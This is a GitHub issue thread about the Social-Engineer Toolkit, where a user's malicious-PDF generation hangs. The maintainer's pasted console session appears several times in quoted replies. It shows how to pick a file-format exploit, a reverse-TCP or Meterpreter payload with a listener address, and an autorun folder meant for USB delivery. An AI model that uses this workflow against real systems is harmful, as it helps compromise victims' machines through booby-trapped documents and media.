trustedsec
commented
8 years ago This was fixed several versions ago.. Which version of SET are you using ?
Closed andranik-sahakyan closed 8 years ago
trustedsec
commented
8 years ago This was fixed several versions ago.. Which version of SET are you using ?
andranik-sahakyan
commented
8 years ago I am on the latest version of SET, it still doesn't work.
On Mar 23, 2016, at 2:44 PM, trustedsec notifications@github.com wrote:
This was fixed several versions ago.. Which version of SET are you using ?
— You are receiving this because you authored the thread. Reply to this email directly or view it on GitHub
trustedsec
commented
8 years ago On the latest rolling and 7.0.3 I'm unable to reproduce this with a fresh Kali. Can you paste the output and options you are specifying ?
trustedsec
commented
8 years ago I'm still unable to reproduce this on Kali:
set:infectious>1 set:infectious> IP address for the reverse connection (payload):10.10.10.10 /pentest/exploitation/metasploit/
Select the file format exploit you want. The default is the PDF embedded EXE.
********** PAYLOADS **********1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP) 2) SET Custom Written Document UNC LM SMB Capture Attack 3) MS15-100 Microsoft Windows Media Center MCL Vulnerability 4) MS14-017 Microsoft Word RTF Object Confusion (2014-04-01) 5) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow 6) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087) 7) Adobe Flash Player "Button" Remote Code Execution 8) Adobe CoolType SING Table "uniqueName" Overflow 9) Adobe Flash Player "newfunction" Invalid Pointer Use 10) Adobe Collab.collectEmailInfo Buffer Overflow 11) Adobe Collab.getIcon Buffer Overflow 12) Adobe JBIG2Decode Memory Corruption Exploit 13) Adobe PDF Embedded EXE Social Engineering 14) Adobe util.printf() Buffer Overflow 15) Custom EXE to VBA (sent via RAR) (RAR required) 16) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun 17) Adobe PDF Embedded EXE Social Engineering (NOJS) 18) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow 19) Apple QuickTime PICT PnSize Buffer Overflow 20) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow 21) Adobe Reader u3D Memory Corruption Vulnerability 22) MSCOMCTL ActiveX Buffer Overflow (ms12-027)
set:payloads>21
1) Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker 2) Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back to attacker 3) Windows Reverse VNC DLL Spawn a VNC server on victim and send back to attacker 4) Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline 5) Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64), Meterpreter 6) Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on remote system 7) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter
set:payloads>2 set> IP address for the payload listener (LHOST): 10.10.10.10 set:payloads> Port to connect back on [443]:443 [-] Generating fileformat exploit... [] Waiting for payload generation to complete... [] Waiting for payload generation to complete... [] Waiting for payload generation to complete... [] Waiting for payload generation to complete... [] Waiting for payload generation to complete... [] Waiting for payload generation to complete... [] Waiting for payload generation to complete... [] Payload creation complete. [] All payloads get sent to the template.pdf directory [] Your attack has been created in the SET home directory (/root/.set/) folder 'autorun' [*] Note a backup copy of template.pdf is also in /root/.set/template.pdf if needed. [-] Copy the contents of the folder to a CD/DVD/USB to autorun set> Create a listener right now [yes|no]:
andranik-sahakyan
commented
8 years ago I was using #13, the Adobe PDF Embedded EXE, maybe that’s why.
On Mar 23, 2016, at 5:49 PM, trustedsec notifications@github.com wrote:
I'm still unable to reproduce this on Kali:
set:infectious>1 set:infectious> IP address for the reverse connection (payload):10.10.10.10 /pentest/exploitation/metasploit/
Select the file format exploit you want. The default is the PDF embedded EXE.
********** PAYLOADS **********1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP) 2) SET Custom Written Document UNC LM SMB Capture Attack 3) MS15-100 Microsoft Windows Media Center MCL Vulnerability 4) MS14-017 Microsoft Word RTF Object Confusion (2014-04-01) 5) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow 6) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087) 7) Adobe Flash Player "Button" Remote Code Execution 8) Adobe CoolType SING Table "uniqueName" Overflow 9) Adobe Flash Player "newfunction" Invalid Pointer Use 10) Adobe Collab.collectEmailInfo Buffer Overflow 11) Adobe Collab.getIcon Buffer Overflow 12) Adobe JBIG2Decode Memory Corruption Exploit 13) Adobe PDF Embedded EXE Social Engineering 14) Adobe util.printf() Buffer Overflow 15) Custom EXE to VBA (sent via RAR) (RAR required) 16) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun 17) Adobe PDF Embedded EXE Social Engineering (NOJS) 18) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow 19) Apple QuickTime PICT PnSize Buffer Overflow 20) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow 21) Adobe Reader u3D Memory Corruption Vulnerability 22) MSCOMCTL ActiveX Buffer Overflow (ms12-027)
set:payloads>21
1) Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker 2) Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back to attacker 3) Windows Reverse VNC DLL Spawn a VNC server on victim and send back to attacker 4) Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline 5) Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64), Meterpreter 6) Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on remote system 7) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter
set:payloads>2 set> IP address for the payload listener (LHOST): 10.10.10.10 set:payloads> Port to connect back on [443]:443 [-] Generating fileformat exploit... [] Waiting for payload generation to complete... [] Waiting for payload generation to complete... [] Waiting for payload generation to complete... [] Waiting for payload generation to complete... [] Waiting for payload generation to complete... [] Waiting for payload generation to complete... [] Waiting for payload generation to complete... [] Payload creation complete. [] All payloads get sent to the template.pdf directory [] Your attack has been created in the SET home directory (/root/.set/) folder 'autorun' [*] Note a backup copy of template.pdf is also in /root/.set/template.pdf if needed. [-] Copy the contents of the folder to a CD/DVD/USB to autorun set> Create a listener right now [yes|no]:
— You are receiving this because you authored the thread. Reply to this email directly or view it on GitHub https://github.com/trustedsec/social-engineer-toolkit/issues/214#issuecomment-200600294
andranik-sahakyan
commented
8 years ago I tried the same configuration as this and it is still continuing with the “Waiting for payload generation to complete” message.
On Mar 23, 2016, at 5:49 PM, trustedsec notifications@github.com wrote:
I'm still unable to reproduce this on Kali:
set:infectious>1 set:infectious> IP address for the reverse connection (payload):10.10.10.10 /pentest/exploitation/metasploit/
Select the file format exploit you want. The default is the PDF embedded EXE.
********** PAYLOADS **********1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP) 2) SET Custom Written Document UNC LM SMB Capture Attack 3) MS15-100 Microsoft Windows Media Center MCL Vulnerability 4) MS14-017 Microsoft Word RTF Object Confusion (2014-04-01) 5) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow 6) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087) 7) Adobe Flash Player "Button" Remote Code Execution 8) Adobe CoolType SING Table "uniqueName" Overflow 9) Adobe Flash Player "newfunction" Invalid Pointer Use 10) Adobe Collab.collectEmailInfo Buffer Overflow 11) Adobe Collab.getIcon Buffer Overflow 12) Adobe JBIG2Decode Memory Corruption Exploit 13) Adobe PDF Embedded EXE Social Engineering 14) Adobe util.printf() Buffer Overflow 15) Custom EXE to VBA (sent via RAR) (RAR required) 16) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun 17) Adobe PDF Embedded EXE Social Engineering (NOJS) 18) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow 19) Apple QuickTime PICT PnSize Buffer Overflow 20) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow 21) Adobe Reader u3D Memory Corruption Vulnerability 22) MSCOMCTL ActiveX Buffer Overflow (ms12-027)
set:payloads>21
1) Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker 2) Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back to attacker 3) Windows Reverse VNC DLL Spawn a VNC server on victim and send back to attacker 4) Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline 5) Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64), Meterpreter 6) Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on remote system 7) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter
set:payloads>2 set> IP address for the payload listener (LHOST): 10.10.10.10 set:payloads> Port to connect back on [443]:443 [-] Generating fileformat exploit... [] Waiting for payload generation to complete... [] Waiting for payload generation to complete... [] Waiting for payload generation to complete... [] Waiting for payload generation to complete... [] Waiting for payload generation to complete... [] Waiting for payload generation to complete... [] Waiting for payload generation to complete... [] Payload creation complete. [] All payloads get sent to the template.pdf directory [] Your attack has been created in the SET home directory (/root/.set/) folder 'autorun' [*] Note a backup copy of template.pdf is also in /root/.set/template.pdf if needed. [-] Copy the contents of the folder to a CD/DVD/USB to autorun set> Create a listener right now [yes|no]:
— You are receiving this because you authored the thread. Reply to this email directly or view it on GitHub https://github.com/trustedsec/social-engineer-toolkit/issues/214#issuecomment-200600294
The malicious PDF in the Infectious Media Generator never works and it just says "generating" forever.